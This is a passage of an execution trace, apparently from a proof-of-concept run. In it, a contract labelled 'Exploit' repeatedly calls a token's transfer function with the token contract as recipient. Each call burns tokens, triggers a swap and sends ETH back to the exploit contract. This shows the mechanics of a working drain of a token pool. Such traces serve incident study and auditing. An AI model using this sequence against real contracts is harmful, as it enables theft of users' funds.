    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001212c4b9236a86c1
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x000000000000000000000000000000000000000000000000121282c55ab4e93d → 0x0000000000000000000000000000000000000000000000001212c4b9236a86c1
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b88af415ab026dd27fbd → 0x00000000000000000000000000000000000000000000b8abeed16faf29e7504f
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c55344df69e8d9677c0 → 0x000000000000000000000000000000000000000000001c44b6f014482f8c0f77
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141607f2e7c98f0d2a37 → 0x0000000000000000000000000000000000000000000014168697007f598d7a24
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000001394df7cc68fac5bd70 → 0x000000000000000000000000000000000000000000000128d099ea129cbb5527
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf2410b5ffb18ac6391 → 0x000000000000000000000000000000000000000000013bf2bfaf78b0e32cb37e
    │   │   @ 21: 0x000000000000000000000000000000000000000000000000121282c55ab4e93d → 0x0000000000000000000000000000000000000000000000001212c4b9236a86c1
    │   │   @ 17: 0x00000000000000000000000000000000000000000000008605343e44ee44e8fa → 0x0000000000000000000000000000000000000000000000860b586c8ac0f25a54
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x000000000000000000000000000000000000000000000000121306acec202445
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001212c4b9236a86c1 → 0x000000000000000000000000000000000000000000000000121306acec202445
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c44b6f014482f8c0f77 → 0x000000000000000000000000000000000000000000001c34399231f1d181a72e
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf2bfaf78b0e32cb37e → 0x000000000000000000000000000000000000000000013bf33e539166adad036b
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001212c4b9236a86c1 → 0x000000000000000000000000000000000000000000000000121306acec202445
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b8abeed16faf29e7504f → 0x00000000000000000000000000000000000000000000b8cce98d345be5fc20e1
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000128d099ea129cbb5527 → 0x000000000000000000000000000000000000000000000118533c07bc3eb0ecde
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000860b586c8ac0f25a54 → 0x000000000000000000000000000000000000000000000086117c9ad0939fcbae
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x0000000000000000000000000000000000000000000014168697007f598d7a24 → 0x000000000000000000000000000000000000000000001417053b1935240dca11
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x000000000000000000000000000000000000000000000000121348a0b4d5c1c9
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x000000000000000000000000000000000000000000000000121306acec202445 → 0x000000000000000000000000000000000000000000000000121348a0b4d5c1c9
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c34399231f1d181a72e → 0x000000000000000000000000000000000000000000001c23bc344f9b73773ee5
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000118533c07bc3eb0ecde → 0x000000000000000000000000000000000000000000000107d5de2565e0a68495
    │   │   @ 17: 0x000000000000000000000000000000000000000000000086117c9ad0939fcbae → 0x00000000000000000000000000000000000000000000008617a0c916664d3d08
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b8cce98d345be5fc20e1 → 0x00000000000000000000000000000000000000000000b8ede448f908a210f173
    │   │   @ 21: 0x000000000000000000000000000000000000000000000000121306acec202445 → 0x000000000000000000000000000000000000000000000000121348a0b4d5c1c9
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf33e539166adad036b → 0x000000000000000000000000000000000000000000013bf3bcf7aa1c782d5358
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x000000000000000000000000000000000000000000001417053b1935240dca11 → 0x00000000000000000000000000000000000000000000141783df31eaee8e19fe
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x00000000000000000000000000000000000000000000000012138a947d8b5f4d
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x000000000000000000000000000000000000000000000000121348a0b4d5c1c9 → 0x00000000000000000000000000000000000000000000000012138a947d8b5f4d
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000107d5de2565e0a68495 → 0x0000000000000000000000000000000000000000000000f75880430f829c1c4c
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf3bcf7aa1c782d5358 → 0x000000000000000000000000000000000000000000013bf43b9bc2d242ada345
    │   │   @ 17: 0x00000000000000000000000000000000000000000000008617a0c916664d3d08 → 0x0000000000000000000000000000000000000000000000861dc4f75c38faae62
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b8ede448f908a210f173 → 0x00000000000000000000000000000000000000000000b90edf04bdb55e25c205
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141783df31eaee8e19fe → 0x00000000000000000000000000000000000000000000141802834aa0b90e69eb
    │   │   @ 21: 0x000000000000000000000000000000000000000000000000121348a0b4d5c1c9 → 0x00000000000000000000000000000000000000000000000012138a947d8b5f4d
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c23bc344f9b73773ee5 → 0x000000000000000000000000000000000000000000001c133ed66d45156cd69c
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001213cc884640fcd1
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x00000000000000000000000000000000000000000000000012138a947d8b5f4d → 0x0000000000000000000000000000000000000000000000001213cc884640fcd1
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141802834aa0b90e69eb → 0x00000000000000000000000000000000000000000000141881276356838eb9d8
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b90edf04bdb55e25c205 → 0x00000000000000000000000000000000000000000000b92fd9c082621a3a9297
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf43b9bc2d242ada345 → 0x000000000000000000000000000000000000000000013bf4ba3fdb880d2df332
    │   │   @ 21: 0x00000000000000000000000000000000000000000000000012138a947d8b5f4d → 0x0000000000000000000000000000000000000000000000001213cc884640fcd1
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000861dc4f75c38faae62 → 0x00000000000000000000000000000000000000000000008623e925a20ba81fbc
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c133ed66d45156cd69c → 0x000000000000000000000000000000000000000000001c02c1788aeeb7626e53
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000f75880430f829c1c4c → 0x0000000000000000000000000000000000000000000000e6db2260b92491b403
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x00000000000000000000000000000000000000000000000012140e7c0ef69a55
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001213cc884640fcd1 → 0x00000000000000000000000000000000000000000000000012140e7c0ef69a55
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf4ba3fdb880d2df332 → 0x000000000000000000000000000000000000000000013bf538e3f43dd7ae431f
    │   │   @ 17: 0x00000000000000000000000000000000000000000000008623e925a20ba81fbc → 0x0000000000000000000000000000000000000000000000862a0d53e7de559116
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000e6db2260b92491b403 → 0x0000000000000000000000000000000000000000000000d65dc47e62c6874bba
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001213cc884640fcd1 → 0x00000000000000000000000000000000000000000000000012140e7c0ef69a55
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c02c1788aeeb7626e53 → 0x000000000000000000000000000000000000000000001bf2441aa8985958060a
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b92fd9c082621a3a9297 → 0x00000000000000000000000000000000000000000000b950d47c470ed64f6329
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141881276356838eb9d8 → 0x000000000000000000000000000000000000000000001418ffcb7c0c4e0f09c5
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001214506fd7ac37d9
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x00000000000000000000000000000000000000000000000012140e7c0ef69a55 → 0x0000000000000000000000000000000000000000000000001214506fd7ac37d9
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x000000000000000000000000000000000000000000001418ffcb7c0c4e0f09c5 → 0x0000000000000000000000000000000000000000000014197e6f94c2188f59b2
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000862a0d53e7de559116 → 0x0000000000000000000000000000000000000000000000863031822db1030270
    │   │   @ 21: 0x00000000000000000000000000000000000000000000000012140e7c0ef69a55 → 0x0000000000000000000000000000000000000000000000001214506fd7ac37d9
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000d65dc47e62c6874bba → 0x0000000000000000000000000000000000000000000000c5e0669c0c687ce371
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf538e3f43dd7ae431f → 0x000000000000000000000000000000000000000000013bf5b7880cf3a22e930c
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001bf2441aa8985958060a → 0x000000000000000000000000000000000000000000001be1c6bcc641fb4d9dc1
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b950d47c470ed64f6329 → 0x00000000000000000000000000000000000000000000b971cf380bbb926433bb
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x00000000000000000000000000000000000000000000000012149263a061d55d
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001214506fd7ac37d9 → 0x00000000000000000000000000000000000000000000000012149263a061d55d
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000863031822db1030270 → 0x0000000000000000000000000000000000000000000000863655b07383b073ca
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x0000000000000000000000000000000000000000000014197e6f94c2188f59b2 → 0x000000000000000000000000000000000000000000001419fd13ad77e30fa99f
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf5b7880cf3a22e930c → 0x000000000000000000000000000000000000000000013bf6362c25a96caee2f9
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000c5e0669c0c687ce371 → 0x0000000000000000000000000000000000000000000000b56308b9b60a727b28
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001214506fd7ac37d9 → 0x00000000000000000000000000000000000000000000000012149263a061d55d
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001be1c6bcc641fb4d9dc1 → 0x000000000000000000000000000000000000000000001bd1495ee3eb9d433578
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b971cf380bbb926433bb → 0x00000000000000000000000000000000000000000000b992c9f3d0684e79044d
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001214d457691772e1
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x00000000000000000000000000000000000000000000000012149263a061d55d → 0x0000000000000000000000000000000000000000000000001214d457691772e1
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000863655b07383b073ca → 0x0000000000000000000000000000000000000000000000863c79deb9565de524
    │   │   @ 21: 0x00000000000000000000000000000000000000000000000012149263a061d55d → 0x0000000000000000000000000000000000000000000000001214d457691772e1
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001bd1495ee3eb9d433578 → 0x000000000000000000000000000000000000000000001bc0cc0101953f38cd2f
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000b56308b9b60a727b28 → 0x0000000000000000000000000000000000000000000000a4e5aad75fac6812df
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf6362c25a96caee2f9 → 0x000000000000000000000000000000000000000000013bf6b4d03e5f372f32e6
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x000000000000000000000000000000000000000000001419fd13ad77e30fa99f → 0x00000000000000000000000000000000000000000000141a7bb7c62dad8ff98c
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b992c9f3d0684e79044d → 0x00000000000000000000000000000000000000000000b9b3c4af95150a8dd4df
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001215164b31cd1065
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001214d457691772e1 → 0x0000000000000000000000000000000000000000000000001215164b31cd1065
    │   │   └─ ← [Stop]
